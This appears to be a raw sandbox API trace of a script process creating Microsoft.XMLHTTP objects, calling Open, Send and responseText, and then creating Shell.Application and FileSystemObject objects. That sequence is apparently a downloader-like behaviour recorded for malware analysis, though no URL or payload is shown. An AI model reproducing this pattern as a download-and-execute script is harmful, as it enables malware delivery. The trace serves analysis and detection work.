	[0249.317] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0249.317] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0249.317] ??2@YAPEAX_K@Z () returned 0x62f310
	[0249.317] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0249.317] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.317] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.317] longjmp () 
	[0249.317] longjmp () 
	[0249.317] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0249.317] SysStringLen (param_1=0x0) returned 0x0
	[0249.317] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0249.317] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0249.317] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0249.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0249.318] ??2@YAPEAX_K@Z () returned 0x62f330
	[0249.318] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0249.318] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0249.318] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0249.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0249.318] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0249.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.318] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0249.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.318] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0249.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.921] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0249.921] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0249.921] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.921] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0249.921] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0249.922] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0249.922] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0249.922] SysStringLen (param_1=0x0) returned 0x0
	[0249.922] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0249.922] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0249.922] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0249.922] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0249.922] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0249.922] ??2@YAPEAX_K@Z () returned 0x62f350
	[0249.922] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0249.922] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0249.922] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0249.922] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0249.922] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0249.922] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0249.922] SysStringLen (param_1=0x0) returned 0x0
	[0249.922] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0249.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0249.925] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0249.925] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0249.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0249.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0249.925] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0250.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0250.495] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0250.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0250.497] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0250.497] SysStringLen (param_1=0x0) returned 0x0
	[0250.497] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0250.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0250.497] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0250.497] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0250.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0250.497] ??2@YAPEAX_K@Z () returned 0x62f330
	[0250.497] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0250.497] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0250.497] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0250.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0250.497] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0250.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.497] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0250.499] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.499] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0250.499] SysStringLen (param_1=0x0) returned 0x0
	[0250.500] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0250.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0250.500] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7270) returned 0x0
	[0250.500] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0250.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7270, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0250.500] ??2@YAPEAX_K@Z () returned 0x62f310
	[0250.500] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f310) 
	[0250.500] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0250.500] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0250.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7270, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7270) returned 0x0
	[0250.500] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7270) returned 0x3
	[0250.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7270, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0250.500] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7270, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0250.500] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7270, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0250.500] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0250.500] SysStringLen (param_1=0x0) returned 0x0
